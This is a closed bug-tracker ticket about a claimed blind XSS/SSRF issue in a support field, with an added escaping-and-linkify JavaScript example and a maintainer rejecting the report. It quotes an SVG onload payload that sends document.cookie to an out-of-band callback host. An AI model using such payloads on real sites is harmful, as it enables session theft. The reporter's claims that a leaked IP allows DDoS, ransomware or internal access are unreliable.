- Status: Closed
- Assigned To: cbay - Private
- Opened by Gowt - 08.09.2025
- Last edited by cbay - 08.09.2025
FS#210 - Blind SSRF Vulnerability in the support field and Message endpoint
Description:- The vulnerability being demonstrated is Blind Cross-Site Scripting (Blind XSS), a subset of stored XSS, where an attacker injects a malicious script (like an SVG onload payload) that is stored by the application and executed in a different context—usually when viewed by an unsuspecting party, such as an administrator or support user.
Payload:- car’”?><svg/onload=“fetch(’https://adr0y18zp382qw4i8tqpvsj3eukl8gw5.oastify.com?cookie='+document.cookie)">%22%3E) —> see, it shows the hyperlink to click; if any support assistance employee clicks it, it would leak the IP of the internal organization and the attacker can perform DDoS or access internal data via endpoints.
Blind XSS: This occurs when the injected payload is stored and only triggers execution out-of-band (not in the attacker’s immediate session), typically when accessed or rendered by someone else, such as through an admin dashboard or email notification.
The payload (<svg/onload=…>) abuses SVG tags to execute JavaScript, exfiltrating sensitive data like cookies to an external domain controlled by the attacker.
Impact:- The script executes when the comment is rendered, sending the victim’s IP address and cookie to the attacker’s Burp Collaborator or a similar endpoint, as observed in Burp Suite.
Because the attacker does not immediately see the results, but instead receives a callback containing the stolen data, this is specifically termed “blind” XSS.
Video link:- https://drive.google.com/file/d/10N9lspffD9loJaEQMxoK0ikdWoDwU9Xc/view?usp=sharing
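The report describes a stored SVG `onload` payload that only fires if the support field is inserted into the admin view as raw HTML. As an added example (not Flyspray's code and not the reporter's), the renderer below shows the defensive pattern a tracker applies to such a field: HTML-escape the stored text, then turn plain http(s) URLs into links. The result is that the payload shows up as inert text plus a clickable link, which matches the behaviour discussed later in this thread. The sample message and the callback host `collaborator.example` are constructed for the example; the function names are assumptions.

```javascript
// Added example: safe rendering of a stored support/message field.
// Not part of Flyspray; names and sample data are constructed here.

// Minimal HTML escaping for text nodes and double-quoted attributes.
const ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ESCAPES[c]);
}

// Constructed sample of the kind of value submitted in the support field.
// The callback host is a placeholder, not the one from the report.
const STORED_MESSAGE = `car'"?><svg/onload="fetch('https://collaborator.example/?c='+document.cookie)">`;

// Render the way an admin/support page should: every character is escaped,
// and only plain http(s) URLs found in the text become <a> elements.
// The unsafe alternative is simply inserting `raw` into innerHTML unchanged.
function renderMessage(raw) {
  const text = String(raw);
  const urlRe = /https?:\/\/[^\s<>"')]+/g;
  const parts = [];
  let last = 0;
  for (const m of text.matchAll(urlRe)) {
    parts.push(escapeHtml(text.slice(last, m.index)));
    const url = escapeHtml(m[0]);
    parts.push(`<a href="${url}" rel="noopener noreferrer">${url}</a>`);
    last = m.index + m[0].length;
  }
  parts.push(escapeHtml(text.slice(last)));
  return parts.join('');
}

// Check used to confirm the rendered fragment contains no markup other than
// the anchors produced above (so no <svg>, no event handler attributes).
function onlyAnchorTags(html) {
  const tags = html.match(/<[^>]*>/g) || [];
  return tags.every(
    (t) => /^<a href="[^"]*" rel="noopener noreferrer">$/.test(t) || t === '</a>'
  );
}

// Stand-alone usage: print the rendered fragment and the check result.
console.log(renderMessage(STORED_MESSAGE));
console.log('only anchors:', onlyAnchorTags(renderMessage(STORED_MESSAGE)));
```

The `onlyAnchorTags` check is the kind of assertion a unit test for the admin view can carry: after rendering, the only tags that may exist are the ones the linkifier itself emitted. Escaping happens before linkification so that the URL's surrounding characters (quotes, the `<svg` fragment) can never be reinterpreted as markup.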
Hello,
That's not true, we can even see in your video that you do click on the link.
Kind regards,
Cyril
Yes, I clicked. What if you, sir, or the support team unfortunately clicked the link? Then the internal IP of the organization is leaked, which causes a DDoS attack to cause server downtime, or we can use the IP to make unauthorized requests to the server and cloud resources as the attacker.
An attacker can follow the same process to create a malicious link and get the support team to click on it via a social engineering attack, and can also cause ransomware attacks by this process.
It has nothing to do with SSRF or XSS. Yes, if we do click on a user-supplied link, it will "leak" our own IP. That's how the web (and Internet) works.
It's not that your IP "leaks"; your system IP leaks, and that can also be a vulnerability for the organization: if your internal IP or your IP leaks, the attacker can use your leaked IP to make unauthorized requests so that the server thinks the IP is from an authorised IP, an internal organization IP, and so the attacker can access sensitive information from the organization server.